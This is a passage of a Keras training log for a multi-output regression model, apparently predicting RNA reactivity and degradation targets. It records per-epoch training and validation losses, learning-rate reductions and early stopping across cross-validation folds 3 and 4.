120/120 - 7s - loss: 3.7694 - output_react_loss: 0.3981 - output_bg_ph_loss: 0.4149 - output_ph_loss: 0.6489 - output_mg_c_loss: 0.4337 - output_c_loss: 0.6269 - val_loss: 4.3503 - val_output_react_loss: 0.4886 - val_output_bg_ph_loss: 0.6355 - val_output_ph_loss: 0.5817 - val_output_mg_c_loss: 0.5111 - val_output_c_loss: 0.4981
Epoch 00054: early stopping
FOLD: 3
Epoch 1/70
120/120 - 9s - loss: 8.8878 - output_react_loss: 0.9465 - output_bg_ph_loss: 1.1514 - output_ph_loss: 1.3084 - output_mg_c_loss: 1.1391 - output_c_loss: 1.1053 - val_loss: 6.8064 - val_output_react_loss: 0.7579 - val_output_bg_ph_loss: 0.9719 - val_output_ph_loss: 0.8874 - val_output_mg_c_loss: 0.8577 - val_output_c_loss: 0.7440
Epoch 2/70
120/120 - 7s - loss: 7.5866 - output_react_loss: 0.8103 - output_bg_ph_loss: 0.9564 - output_ph_loss: 1.1300 - output_mg_c_loss: 0.9663 - output_c_loss: 0.9906 - val_loss: 5.9556 - val_output_react_loss: 0.6788 - val_output_bg_ph_loss: 0.8620 - val_output_ph_loss: 0.7972 - val_output_mg_c_loss: 0.7089 - val_output_c_loss: 0.6591
Epoch 3/70
120/120 - 7s - loss: 7.1029 - output_react_loss: 0.7670 - output_bg_ph_loss: 0.8975 - output_ph_loss: 1.0765 - output_mg_c_loss: 0.8802 - output_c_loss: 0.9372 - val_loss: 5.5450 - val_output_react_loss: 0.6525 - val_output_bg_ph_loss: 0.7868 - val_output_ph_loss: 0.7563 - val_output_mg_c_loss: 0.6494 - val_output_c_loss: 0.6112
Epoch 4/70
120/120 - 7s - loss: 6.6969 - output_react_loss: 0.7376 - output_bg_ph_loss: 0.8420 - output_ph_loss: 1.0159 - output_mg_c_loss: 0.8264 - output_c_loss: 0.8691 - val_loss: 5.2467 - val_output_react_loss: 0.6092 - val_output_bg_ph_loss: 0.7460 - val_output_ph_loss: 0.7138 - val_output_mg_c_loss: 0.6214 - val_output_c_loss: 0.5797
Epoch 5/70
120/120 - 7s - loss: 6.4476 - output_react_loss: 0.7109 - output_bg_ph_loss: 0.8136 - output_ph_loss: 0.9755 - output_mg_c_loss: 0.7868 - output_c_loss: 0.8494 - val_loss: 5.0943 - val_output_react_loss: 0.5976 - val_output_bg_ph_loss: 0.7243 - val_output_ph_loss: 0.7027 - val_output_mg_c_loss: 0.5918 - val_output_c_loss: 0.5641
Epoch 6/70
120/120 - 7s - loss: 6.3095 - output_react_loss: 0.7026 - output_bg_ph_loss: 0.7853 - output_ph_loss: 0.9685 - output_mg_c_loss: 0.7654 - output_c_loss: 0.8344 - val_loss: 4.9502 - val_output_react_loss: 0.5770 - val_output_bg_ph_loss: 0.7029 - val_output_ph_loss: 0.6805 - val_output_mg_c_loss: 0.5747 - val_output_c_loss: 0.5605
Epoch 7/70
120/120 - 7s - loss: 6.0598 - output_react_loss: 0.6725 - output_bg_ph_loss: 0.7548 - output_ph_loss: 0.9201 - output_mg_c_loss: 0.7363 - output_c_loss: 0.8123 - val_loss: 4.8857 - val_output_react_loss: 0.5688 - val_output_bg_ph_loss: 0.6976 - val_output_ph_loss: 0.6561 - val_output_mg_c_loss: 0.5791 - val_output_c_loss: 0.5388
Epoch 8/70
120/120 - 7s - loss: 6.0025 - output_react_loss: 0.6656 - output_bg_ph_loss: 0.7450 - output_ph_loss: 0.9193 - output_mg_c_loss: 0.7267 - output_c_loss: 0.8085 - val_loss: 4.8275 - val_output_react_loss: 0.5589 - val_output_bg_ph_loss: 0.6901 - val_output_ph_loss: 0.6632 - val_output_mg_c_loss: 0.5609 - val_output_c_loss: 0.5444
Epoch 9/70
120/120 - 7s - loss: 5.8000 - output_react_loss: 0.6429 - output_bg_ph_loss: 0.7186 - output_ph_loss: 0.8900 - output_mg_c_loss: 0.6959 - output_c_loss: 0.7954 - val_loss: 4.8379 - val_output_react_loss: 0.5601 - val_output_bg_ph_loss: 0.6958 - val_output_ph_loss: 0.6618 - val_output_mg_c_loss: 0.5629 - val_output_c_loss: 0.5385
Epoch 10/70
120/120 - 7s - loss: 5.7426 - output_react_loss: 0.6346 - output_bg_ph_loss: 0.7066 - output_ph_loss: 0.8856 - output_mg_c_loss: 0.6923 - output_c_loss: 0.7900 - val_loss: 4.7528 - val_output_react_loss: 0.5533 - val_output_bg_ph_loss: 0.6816 - val_output_ph_loss: 0.6431 - val_output_mg_c_loss: 0.5523 - val_output_c_loss: 0.5353
Epoch 11/70
120/120 - 7s - loss: 5.5888 - output_react_loss: 0.6175 - output_bg_ph_loss: 0.6880 - output_ph_loss: 0.8729 - output_mg_c_loss: 0.6694 - output_c_loss: 0.7663 - val_loss: 4.6962 - val_output_react_loss: 0.5468 - val_output_bg_ph_loss: 0.6738 - val_output_ph_loss: 0.6295 - val_output_mg_c_loss: 0.5505 - val_output_c_loss: 0.5243
Epoch 12/70
120/120 - 7s - loss: 5.4090 - output_react_loss: 0.6094 - output_bg_ph_loss: 0.6587 - output_ph_loss: 0.8390 - output_mg_c_loss: 0.6427 - output_c_loss: 0.7485 - val_loss: 4.6933 - val_output_react_loss: 0.5430 - val_output_bg_ph_loss: 0.6665 - val_output_ph_loss: 0.6346 - val_output_mg_c_loss: 0.5538 - val_output_c_loss: 0.5320
Epoch 13/70
120/120 - 7s - loss: 5.2612 - output_react_loss: 0.5896 - output_bg_ph_loss: 0.6432 - output_ph_loss: 0.8160 - output_mg_c_loss: 0.6258 - output_c_loss: 0.7279 - val_loss: 4.7046 - val_output_react_loss: 0.5389 - val_output_bg_ph_loss: 0.6817 - val_output_ph_loss: 0.6311 - val_output_mg_c_loss: 0.5543 - val_output_c_loss: 0.5237
Epoch 14/70
120/120 - 7s - loss: 5.2187 - output_react_loss: 0.5794 - output_bg_ph_loss: 0.6374 - output_ph_loss: 0.8238 - output_mg_c_loss: 0.6175 - output_c_loss: 0.7265 - val_loss: 4.6621 - val_output_react_loss: 0.5476 - val_output_bg_ph_loss: 0.6648 - val_output_ph_loss: 0.6268 - val_output_mg_c_loss: 0.5409 - val_output_c_loss: 0.5285
Epoch 15/70
120/120 - 7s - loss: 5.3190 - output_react_loss: 0.5846 - output_bg_ph_loss: 0.6397 - output_ph_loss: 0.8447 - output_mg_c_loss: 0.6308 - output_c_loss: 0.7639 - val_loss: 4.6176 - val_output_react_loss: 0.5359 - val_output_bg_ph_loss: 0.6655 - val_output_ph_loss: 0.6204 - val_output_mg_c_loss: 0.5372 - val_output_c_loss: 0.5199
Epoch 16/70
120/120 - 7s - loss: 5.0473 - output_react_loss: 0.5641 - output_bg_ph_loss: 0.6095 - output_ph_loss: 0.8032 - output_mg_c_loss: 0.5915 - output_c_loss: 0.7138 - val_loss: 4.6430 - val_output_react_loss: 0.5349 - val_output_bg_ph_loss: 0.6725 - val_output_ph_loss: 0.6229 - val_output_mg_c_loss: 0.5424 - val_output_c_loss: 0.5205
Epoch 17/70
120/120 - 7s - loss: 4.9326 - output_react_loss: 0.5489 - output_bg_ph_loss: 0.5868 - output_ph_loss: 0.7831 - output_mg_c_loss: 0.5786 - output_c_loss: 0.7209 - val_loss: 4.5794 - val_output_react_loss: 0.5290 - val_output_bg_ph_loss: 0.6614 - val_output_ph_loss: 0.6149 - val_output_mg_c_loss: 0.5338 - val_output_c_loss: 0.5161
Epoch 18/70
120/120 - 7s - loss: 4.9355 - output_react_loss: 0.5483 - output_bg_ph_loss: 0.5927 - output_ph_loss: 0.7782 - output_mg_c_loss: 0.5787 - output_c_loss: 0.7180 - val_loss: 4.6358 - val_output_react_loss: 0.5300 - val_output_bg_ph_loss: 0.6729 - val_output_ph_loss: 0.6295 - val_output_mg_c_loss: 0.5395 - val_output_c_loss: 0.5215
Epoch 19/70
120/120 - 8s - loss: 5.0316 - output_react_loss: 0.5538 - output_bg_ph_loss: 0.5885 - output_ph_loss: 0.8241 - output_mg_c_loss: 0.5893 - output_c_loss: 0.7444 - val_loss: 4.6052 - val_output_react_loss: 0.5313 - val_output_bg_ph_loss: 0.6665 - val_output_ph_loss: 0.6143 - val_output_mg_c_loss: 0.5373 - val_output_c_loss: 0.5206
Epoch 20/70
120/120 - 7s - loss: 4.7251 - output_react_loss: 0.5275 - output_bg_ph_loss: 0.5618 - output_ph_loss: 0.7502 - output_mg_c_loss: 0.5501 - output_c_loss: 0.6961 - val_loss: 4.5849 - val_output_react_loss: 0.5374 - val_output_bg_ph_loss: 0.6602 - val_output_ph_loss: 0.6142 - val_output_mg_c_loss: 0.5287 - val_output_c_loss: 0.5181
Epoch 21/70
120/120 - 7s - loss: 4.6258 - output_react_loss: 0.5121 - output_bg_ph_loss: 0.5549 - output_ph_loss: 0.7380 - output_mg_c_loss: 0.5426 - output_c_loss: 0.6686 - val_loss: 4.5551 - val_output_react_loss: 0.5311 - val_output_bg_ph_loss: 0.6546 - val_output_ph_loss: 0.6146 - val_output_mg_c_loss: 0.5248 - val_output_c_loss: 0.5197
Epoch 22/70
120/120 - 7s - loss: 4.7790 - output_react_loss: 0.5214 - output_bg_ph_loss: 0.5564 - output_ph_loss: 0.7906 - output_mg_c_loss: 0.5594 - output_c_loss: 0.7140 - val_loss: 4.5911 - val_output_react_loss: 0.5309 - val_output_bg_ph_loss: 0.6656 - val_output_ph_loss: 0.6121 - val_output_mg_c_loss: 0.5339 - val_output_c_loss: 0.5181
Epoch 23/70
120/120 - 7s - loss: 4.6777 - output_react_loss: 0.5160 - output_bg_ph_loss: 0.5486 - output_ph_loss: 0.7594 - output_mg_c_loss: 0.5436 - output_c_loss: 0.7019 - val_loss: 4.5732 - val_output_react_loss: 0.5345 - val_output_bg_ph_loss: 0.6562 - val_output_ph_loss: 0.6131 - val_output_mg_c_loss: 0.5282 - val_output_c_loss: 0.5224
Epoch 24/70
120/120 - 7s - loss: 4.6942 - output_react_loss: 0.5073 - output_bg_ph_loss: 0.5480 - output_ph_loss: 0.7827 - output_mg_c_loss: 0.5429 - output_c_loss: 0.7151 - val_loss: 4.5363 - val_output_react_loss: 0.5251 - val_output_bg_ph_loss: 0.6569 - val_output_ph_loss: 0.6108 - val_output_mg_c_loss: 0.5240 - val_output_c_loss: 0.5135
Epoch 25/70
120/120 - 7s - loss: 4.4474 - output_react_loss: 0.4898 - output_bg_ph_loss: 0.5233 - output_ph_loss: 0.7180 - output_mg_c_loss: 0.5243 - output_c_loss: 0.6546 - val_loss: 4.5785 - val_output_react_loss: 0.5333 - val_output_bg_ph_loss: 0.6567 - val_output_ph_loss: 0.6147 - val_output_mg_c_loss: 0.5327 - val_output_c_loss: 0.5183
Epoch 26/70
120/120 - 7s - loss: 4.4364 - output_react_loss: 0.4836 - output_bg_ph_loss: 0.5196 - output_ph_loss: 0.7170 - output_mg_c_loss: 0.5190 - output_c_loss: 0.6751 - val_loss: 4.5358 - val_output_react_loss: 0.5244 - val_output_bg_ph_loss: 0.6547 - val_output_ph_loss: 0.6109 - val_output_mg_c_loss: 0.5261 - val_output_c_loss: 0.5144
Epoch 27/70
120/120 - 7s - loss: 4.5330 - output_react_loss: 0.4975 - output_bg_ph_loss: 0.5284 - output_ph_loss: 0.7392 - output_mg_c_loss: 0.5278 - output_c_loss: 0.6863 - val_loss: 4.5744 - val_output_react_loss: 0.5281 - val_output_bg_ph_loss: 0.6655 - val_output_ph_loss: 0.6125 - val_output_mg_c_loss: 0.5286 - val_output_c_loss: 0.5174
Epoch 28/70
120/120 - 7s - loss: 4.3557 - output_react_loss: 0.4810 - output_bg_ph_loss: 0.5061 - output_ph_loss: 0.7059 - output_mg_c_loss: 0.5066 - output_c_loss: 0.6622 - val_loss: 4.5536 - val_output_react_loss: 0.5334 - val_output_bg_ph_loss: 0.6568 - val_output_ph_loss: 0.6090 - val_output_mg_c_loss: 0.5254 - val_output_c_loss: 0.5135
Epoch 29/70
120/120 - 7s - loss: 4.4306 - output_react_loss: 0.4779 - output_bg_ph_loss: 0.5091 - output_ph_loss: 0.7387 - output_mg_c_loss: 0.5172 - output_c_loss: 0.6837 - val_loss: 4.6267 - val_output_react_loss: 0.5371 - val_output_bg_ph_loss: 0.6648 - val_output_ph_loss: 0.6151 - val_output_mg_c_loss: 0.5398 - val_output_c_loss: 0.5282
Epoch 30/70
120/120 - 7s - loss: 4.5029 - output_react_loss: 0.4844 - output_bg_ph_loss: 0.5150 - output_ph_loss: 0.7510 - output_mg_c_loss: 0.5286 - output_c_loss: 0.6959 - val_loss: 4.5810 - val_output_react_loss: 0.5327 - val_output_bg_ph_loss: 0.6646 - val_output_ph_loss: 0.6125 - val_output_mg_c_loss: 0.5286 - val_output_c_loss: 0.5167
Epoch 31/70
Epoch 00031: ReduceLROnPlateau reducing learning rate to 0.00010000000474974513.
120/120 - 7s - loss: 4.4161 - output_react_loss: 0.4745 - output_bg_ph_loss: 0.5149 - output_ph_loss: 0.7337 - output_mg_c_loss: 0.5139 - output_c_loss: 0.6759 - val_loss: 4.5696 - val_output_react_loss: 0.5333 - val_output_bg_ph_loss: 0.6593 - val_output_ph_loss: 0.6123 - val_output_mg_c_loss: 0.5279 - val_output_c_loss: 0.5163
Epoch 32/70
120/120 - 7s - loss: 4.1864 - output_react_loss: 0.4506 - output_bg_ph_loss: 0.4808 - output_ph_loss: 0.7000 - output_mg_c_loss: 0.4885 - output_c_loss: 0.6466 - val_loss: 4.4873 - val_output_react_loss: 0.5233 - val_output_bg_ph_loss: 0.6486 - val_output_ph_loss: 0.6018 - val_output_mg_c_loss: 0.5162 - val_output_c_loss: 0.5093
Epoch 33/70
120/120 - 7s - loss: 4.0855 - output_react_loss: 0.4382 - output_bg_ph_loss: 0.4705 - output_ph_loss: 0.6808 - output_mg_c_loss: 0.4763 - output_c_loss: 0.6347 - val_loss: 4.4754 - val_output_react_loss: 0.5233 - val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.6000 - val_output_mg_c_loss: 0.5147 - val_output_c_loss: 0.5069
Epoch 34/70
120/120 - 7s - loss: 4.2179 - output_react_loss: 0.4546 - output_bg_ph_loss: 0.4770 - output_ph_loss: 0.7134 - output_mg_c_loss: 0.4834 - output_c_loss: 0.6746 - val_loss: 4.4678 - val_output_react_loss: 0.5224 - val_output_bg_ph_loss: 0.6447 - val_output_ph_loss: 0.5986 - val_output_mg_c_loss: 0.5139 - val_output_c_loss: 0.5071
Epoch 35/70
120/120 - 8s - loss: 4.0815 - output_react_loss: 0.4387 - output_bg_ph_loss: 0.4625 - output_ph_loss: 0.6882 - output_mg_c_loss: 0.4749 - output_c_loss: 0.6413 - val_loss: 4.4744 - val_output_react_loss: 0.5229 - val_output_bg_ph_loss: 0.6451 - val_output_ph_loss: 0.6008 - val_output_mg_c_loss: 0.5145 - val_output_c_loss: 0.5086
Epoch 36/70
120/120 - 7s - loss: 3.9169 - output_react_loss: 0.4280 - output_bg_ph_loss: 0.4465 - output_ph_loss: 0.6464 - output_mg_c_loss: 0.4512 - output_c_loss: 0.6190 - val_loss: 4.4753 - val_output_react_loss: 0.5229 - val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.5999 - val_output_mg_c_loss: 0.5151 - val_output_c_loss: 0.5068
Epoch 37/70
120/120 - 7s - loss: 4.0919 - output_react_loss: 0.4353 - output_bg_ph_loss: 0.4631 - output_ph_loss: 0.6960 - output_mg_c_loss: 0.4765 - output_c_loss: 0.6463 - val_loss: 4.4893 - val_output_react_loss: 0.5247 - val_output_bg_ph_loss: 0.6476 - val_output_ph_loss: 0.6019 - val_output_mg_c_loss: 0.5167 - val_output_c_loss: 0.5095
Epoch 38/70
120/120 - 7s - loss: 4.0659 - output_react_loss: 0.4359 - output_bg_ph_loss: 0.4577 - output_ph_loss: 0.6921 - output_mg_c_loss: 0.4670 - output_c_loss: 0.6526 - val_loss: 4.4675 - val_output_react_loss: 0.5223 - val_output_bg_ph_loss: 0.6447 - val_output_ph_loss: 0.5998 - val_output_mg_c_loss: 0.5130 - val_output_c_loss: 0.5076
Epoch 39/70
120/120 - 8s - loss: 4.0875 - output_react_loss: 0.4352 - output_bg_ph_loss: 0.4633 - output_ph_loss: 0.6898 - output_mg_c_loss: 0.4738 - output_c_loss: 0.6533 - val_loss: 4.4727 - val_output_react_loss: 0.5232 - val_output_bg_ph_loss: 0.6451 - val_output_ph_loss: 0.6003 - val_output_mg_c_loss: 0.5138 - val_output_c_loss: 0.5081
Epoch 40/70
120/120 - 7s - loss: 4.0767 - output_react_loss: 0.4371 - output_bg_ph_loss: 0.4611 - output_ph_loss: 0.6976 - output_mg_c_loss: 0.4693 - output_c_loss: 0.6442 - val_loss: 4.4739 - val_output_react_loss: 0.5230 - val_output_bg_ph_loss: 0.6453 - val_output_ph_loss: 0.5995 - val_output_mg_c_loss: 0.5148 - val_output_c_loss: 0.5082
Epoch 41/70
120/120 - 7s - loss: 3.8735 - output_react_loss: 0.4178 - output_bg_ph_loss: 0.4458 - output_ph_loss: 0.6334 - output_mg_c_loss: 0.4508 - output_c_loss: 0.6114 - val_loss: 4.4756 - val_output_react_loss: 0.5230 - val_output_bg_ph_loss: 0.6461 - val_output_ph_loss: 0.6011 - val_output_mg_c_loss: 0.5138 - val_output_c_loss: 0.5086
Epoch 42/70
120/120 - 7s - loss: 4.1327 - output_react_loss: 0.4404 - output_bg_ph_loss: 0.4608 - output_ph_loss: 0.7110 - output_mg_c_loss: 0.4753 - output_c_loss: 0.6686 - val_loss: 4.4778 - val_output_react_loss: 0.5237 - val_output_bg_ph_loss: 0.6473 - val_output_ph_loss: 0.6004 - val_output_mg_c_loss: 0.5139 - val_output_c_loss: 0.5076
Epoch 43/70
Epoch 00043: ReduceLROnPlateau reducing learning rate to 1.0000000474974514e-05.
120/120 - 8s - loss: 3.9421 - output_react_loss: 0.4257 - output_bg_ph_loss: 0.4502 - output_ph_loss: 0.6623 - output_mg_c_loss: 0.4530 - output_c_loss: 0.6219 - val_loss: 4.4769 - val_output_react_loss: 0.5229 - val_output_bg_ph_loss: 0.6462 - val_output_ph_loss: 0.6005 - val_output_mg_c_loss: 0.5155 - val_output_c_loss: 0.5072
Epoch 44/70
120/120 - 7s - loss: 3.9330 - output_react_loss: 0.4210 - output_bg_ph_loss: 0.4489 - output_ph_loss: 0.6522 - output_mg_c_loss: 0.4536 - output_c_loss: 0.6336 - val_loss: 4.4741 - val_output_react_loss: 0.5232 - val_output_bg_ph_loss: 0.6460 - val_output_ph_loss: 0.6005 - val_output_mg_c_loss: 0.5140 - val_output_c_loss: 0.5073
Epoch 45/70
120/120 - 7s - loss: 4.0963 - output_react_loss: 0.4412 - output_bg_ph_loss: 0.4577 - output_ph_loss: 0.6950 - output_mg_c_loss: 0.4753 - output_c_loss: 0.6529 - val_loss: 4.4739 - val_output_react_loss: 0.5230 - val_output_bg_ph_loss: 0.6461 - val_output_ph_loss: 0.5999 - val_output_mg_c_loss: 0.5141 - val_output_c_loss: 0.5075
Epoch 46/70
120/120 - 7s - loss: 4.0753 - output_react_loss: 0.4336 - output_bg_ph_loss: 0.4550 - output_ph_loss: 0.7005 - output_mg_c_loss: 0.4690 - output_c_loss: 0.6598 - val_loss: 4.4747 - val_output_react_loss: 0.5229 - val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.6005 - val_output_mg_c_loss: 0.5142 - val_output_c_loss: 0.5074
Epoch 47/70
120/120 - 7s - loss: 3.9274 - output_react_loss: 0.4214 - output_bg_ph_loss: 0.4449 - output_ph_loss: 0.6641 - output_mg_c_loss: 0.4539 - output_c_loss: 0.6230 - val_loss: 4.4726 - val_output_react_loss: 0.5228 - val_output_bg_ph_loss: 0.6461 - val_output_ph_loss: 0.6000 - val_output_mg_c_loss: 0.5139 - val_output_c_loss: 0.5071
Epoch 48/70
Restoring model weights from the end of the best epoch.
Epoch 00048: ReduceLROnPlateau reducing learning rate to 1.0000000656873453e-06.
120/120 - 7s - loss: 3.9150 - output_react_loss: 0.4156 - output_bg_ph_loss: 0.4457 - output_ph_loss: 0.6547 - output_mg_c_loss: 0.4567 - output_c_loss: 0.6243 - val_loss: 4.4713 - val_output_react_loss: 0.5225 - val_output_bg_ph_loss: 0.6460 - val_output_ph_loss: 0.5998 - val_output_mg_c_loss: 0.5137 - val_output_c_loss: 0.5070
Epoch 00048: early stopping
FOLD: 4
Epoch 1/70
120/120 - 9s - loss: 8.8906 - output_react_loss: 0.9509 - output_bg_ph_loss: 1.1470 - output_ph_loss: 1.3217 - output_mg_c_loss: 1.1242 - output_c_loss: 1.1248 - val_loss: 6.7099 - val_output_react_loss: 0.7702 - val_output_bg_ph_loss: 0.9436 - val_output_ph_loss: 0.8752 - val_output_mg_c_loss: 0.8307 - val_output_c_loss: 0.7457
Epoch 2/70
120/120 - 7s - loss: 7.7552 - output_react_loss: 0.8208 - output_bg_ph_loss: 0.9754 - output_ph_loss: 1.1669 - output_mg_c_loss: 0.9870 - output_c_loss: 1.0217 - val_loss: 6.1518 - val_output_react_loss: 0.7047 - val_output_bg_ph_loss: 0.8679 - val_output_ph_loss: 0.8045 - val_output_mg_c_loss: 0.7560 - val_output_c_loss: 0.6901
Epoch 3/70
120/120 - 7s - loss: 7.1821 - output_react_loss: 0.7753 - output_bg_ph_loss: 0.8991 - output_ph_loss: 1.1080 - output_mg_c_loss: 0.8939 - output_c_loss: 0.9375 - val_loss: 5.6383 - val_output_react_loss: 0.6550 - val_output_bg_ph_loss: 0.7970 - val_output_ph_loss: 0.7564 - val_output_mg_c_loss: 0.6784 - val_output_c_loss: 0.6212
Epoch 4/70
120/120 - 7s - loss: 6.7289 - output_react_loss: 0.7362 - output_bg_ph_loss: 0.8336 - output_ph_loss: 1.0447 - output_mg_c_loss: 0.8225 - output_c_loss: 0.8995 - val_loss: 5.2977 - val_output_react_loss: 0.6334 - val_output_bg_ph_loss: 0.7465 - val_output_ph_loss: 0.6968 - val_output_mg_c_loss: 0.6302 - val_output_c_loss: 0.5807
Epoch 5/70
120/120 - 7s - loss: 6.4910 - output_react_loss: 0.7190 - output_bg_ph_loss: 0.8051 - output_ph_loss: 0.9983 - output_mg_c_loss: 0.7908 - output_c_loss: 0.8628 - val_loss: 5.2019 - val_output_react_loss: 0.6135 - val_output_bg_ph_loss: 0.7289 - val_output_ph_loss: 0.6880 - val_output_mg_c_loss: 0.6272 - val_output_c_loss: 0.5747
Epoch 6/70
120/120 - 7s - loss: 6.1684 - output_react_loss: 0.6897 - output_bg_ph_loss: 0.7635 - output_ph_loss: 0.9449 - output_mg_c_loss: 0.7468 - output_c_loss: 0.8238 - val_loss: 5.0363 - val_output_react_loss: 0.5998 - val_output_bg_ph_loss: 0.7134 - val_output_ph_loss: 0.6642 - val_output_mg_c_loss: 0.5947 - val_output_c_loss: 0.5563
Epoch 7/70
120/120 - 7s - loss: 6.2087 - output_react_loss: 0.6861 - output_bg_ph_loss: 0.7609 - output_ph_loss: 0.9620 - output_mg_c_loss: 0.7543 - output_c_loss: 0.8441 - val_loss: 5.0750 - val_output_react_loss: 0.6034 - val_output_bg_ph_loss: 0.7020 - val_output_ph_loss: 0.6790 - val_output_mg_c_loss: 0.6142 - val_output_c_loss: 0.5569
Epoch 8/70
120/120 - 7s - loss: 6.0125 - output_react_loss: 0.6668 - output_bg_ph_loss: 0.7439 - output_ph_loss: 0.9281 - output_mg_c_loss: 0.7213 - output_c_loss: 0.8205 - val_loss: 4.8987 - val_output_react_loss: 0.5870 - val_output_bg_ph_loss: 0.6898 - val_output_ph_loss: 0.6503 - val_output_mg_c_loss: 0.5736 - val_output_c_loss: 0.5477
Epoch 9/70
120/120 - 7s - loss: 5.6743 - output_react_loss: 0.6340 - output_bg_ph_loss: 0.6979 - output_ph_loss: 0.8804 - output_mg_c_loss: 0.6772 - output_c_loss: 0.7756 - val_loss: 4.8440 - val_output_react_loss: 0.5786 - val_output_bg_ph_loss: 0.6811 - val_output_ph_loss: 0.6374 - val_output_mg_c_loss: 0.5707 - val_output_c_loss: 0.5456
Epoch 10/70
120/120 - 7s - loss: 5.8360 - output_react_loss: 0.6532 - output_bg_ph_loss: 0.6981 - output_ph_loss: 0.9233 - output_mg_c_loss: 0.6985 - output_c_loss: 0.8132 - val_loss: 4.8348 - val_output_react_loss: 0.5791 - val_output_bg_ph_loss: 0.6826 - val_output_ph_loss: 0.6364 - val_output_mg_c_loss: 0.5702 - val_output_c_loss: 0.5346
Epoch 11/70
120/120 - 7s - loss: 5.5673 - output_react_loss: 0.6177 - output_bg_ph_loss: 0.6746 - output_ph_loss: 0.8888 - output_mg_c_loss: 0.6622 - output_c_loss: 0.7693 - val_loss: 4.7333 - val_output_react_loss: 0.5694 - val_output_bg_ph_loss: 0.6625 - val_output_ph_loss: 0.6226 - val_output_mg_c_loss: 0.5564 - val_output_c_loss: 0.5340
Epoch 12/70
120/120 - 7s - loss: 5.5214 - output_react_loss: 0.6199 - output_bg_ph_loss: 0.6635 - output_ph_loss: 0.8765 - output_mg_c_loss: 0.6528 - output_c_loss: 0.7725 - val_loss: 4.8059 - val_output_react_loss: 0.5627 - val_output_bg_ph_loss: 0.6731 - val_output_ph_loss: 0.6371 - val_output_mg_c_loss: 0.5799 - val_output_c_loss: 0.5374
Epoch 13/70
120/120 - 7s - loss: 5.3062 - output_react_loss: 0.5977 - output_bg_ph_loss: 0.6392 - output_ph_loss: 0.8410 - output_mg_c_loss: 0.6230 - output_c_loss: 0.7454 - val_loss: 4.7326 - val_output_react_loss: 0.5585 - val_output_bg_ph_loss: 0.6626 - val_output_ph_loss: 0.6208 - val_output_mg_c_loss: 0.5681 - val_output_c_loss: 0.5334
Epoch 14/70
120/120 - 7s - loss: 5.2454 - output_react_loss: 0.5833 - output_bg_ph_loss: 0.6234 - output_ph_loss: 0.8391 - output_mg_c_loss: 0.6176 - output_c_loss: 0.7576 - val_loss: 4.7426 - val_output_react_loss: 0.5517 - val_output_bg_ph_loss: 0.6679 - val_output_ph_loss: 0.6287 - val_output_mg_c_loss: 0.5702 - val_output_c_loss: 0.5343
Epoch 15/70
120/120 - 7s - loss: 5.2718 - output_react_loss: 0.5885 - output_bg_ph_loss: 0.6244 - output_ph_loss: 0.8461 - output_mg_c_loss: 0.6164 - output_c_loss: 0.7671 - val_loss: 4.6895 - val_output_react_loss: 0.5530 - val_output_bg_ph_loss: 0.6561 - val_output_ph_loss: 0.6196 - val_output_mg_c_loss: 0.5603 - val_output_c_loss: 0.5311
Epoch 16/70
120/120 - 8s - loss: 5.0568 - output_react_loss: 0.5666 - output_bg_ph_loss: 0.6042 - output_ph_loss: 0.8064 - output_mg_c_loss: 0.5917 - output_c_loss: 0.7252 - val_loss: 4.7229 - val_output_react_loss: 0.5603 - val_output_bg_ph_loss: 0.6592 - val_output_ph_loss: 0.6172 - val_output_mg_c_loss: 0.5682 - val_output_c_loss: 0.5303
Epoch 17/70
120/120 - 7s - loss: 5.1108 - output_react_loss: 0.5676 - output_bg_ph_loss: 0.6043 - output_ph_loss: 0.8302 - output_mg_c_loss: 0.5973 - output_c_loss: 0.7422 - val_loss: 4.6748 - val_output_react_loss: 0.5490 - val_output_bg_ph_loss: 0.6577 - val_output_ph_loss: 0.6220 - val_output_mg_c_loss: 0.5537 - val_output_c_loss: 0.5321
Epoch 18/70
120/120 - 7s - loss: 4.8097 - output_react_loss: 0.5327 - output_bg_ph_loss: 0.5670 - output_ph_loss: 0.7759 - output_mg_c_loss: 0.5630 - output_c_loss: 0.7083 - val_loss: 4.6194 - val_output_react_loss: 0.5420 - val_output_bg_ph_loss: 0.6526 - val_output_ph_loss: 0.6067 - val_output_mg_c_loss: 0.5501 - val_output_c_loss: 0.5233
Epoch 19/70
120/120 - 7s - loss: 4.9436 - output_react_loss: 0.5502 - output_bg_ph_loss: 0.5810 - output_ph_loss: 0.8112 - output_mg_c_loss: 0.5720 - output_c_loss: 0.7258 - val_loss: 4.6665 - val_output_react_loss: 0.5566 - val_output_bg_ph_loss: 0.6545 - val_output_ph_loss: 0.6094 - val_output_mg_c_loss: 0.5533 - val_output_c_loss: 0.5283
Epoch 20/70
120/120 - 7s - loss: 4.7871 - output_react_loss: 0.5290 - output_bg_ph_loss: 0.5616 - output_ph_loss: 0.7727 - output_mg_c_loss: 0.5615 - output_c_loss: 0.7103 - val_loss: 4.7063 - val_output_react_loss: 0.5511 - val_output_bg_ph_loss: 0.6634 - val_output_ph_loss: 0.6159 - val_output_mg_c_loss: 0.5631 - val_output_c_loss: 0.5352
Epoch 21/70
120/120 - 7s - loss: 4.7750 - output_react_loss: 0.5299 - output_bg_ph_loss: 0.5580 - output_ph_loss: 0.7771 - output_mg_c_loss: 0.5590 - output_c_loss: 0.7043 - val_loss: 4.6158 - val_output_react_loss: 0.5455 - val_output_bg_ph_loss: 0.6464 - val_output_ph_loss: 0.6079 - val_output_mg_c_loss: 0.5490 - val_output_c_loss: 0.5261
Epoch 22/70
120/120 - 7s - loss: 4.7371 - output_react_loss: 0.5229 - output_bg_ph_loss: 0.5488 - output_ph_loss: 0.7858 - output_mg_c_loss: 0.5513 - output_c_loss: 0.7053 - val_loss: 4.5994 - val_output_react_loss: 0.5457 - val_output_bg_ph_loss: 0.6436 - val_output_ph_loss: 0.6061 - val_output_mg_c_loss: 0.5459 - val_output_c_loss: 0.5226
Epoch 23/70
120/120 - 7s - loss: 4.7746 - output_react_loss: 0.5235 - output_bg_ph_loss: 0.5509 - output_ph_loss: 0.8001 - output_mg_c_loss: 0.5547 - output_c_loss: 0.7163 - val_loss: 4.6118 - val_output_react_loss: 0.5429 - val_output_bg_ph_loss: 0.6521 - val_output_ph_loss: 0.6054 - val_output_mg_c_loss: 0.5466 - val_output_c_loss: 0.5232
Epoch 24/70
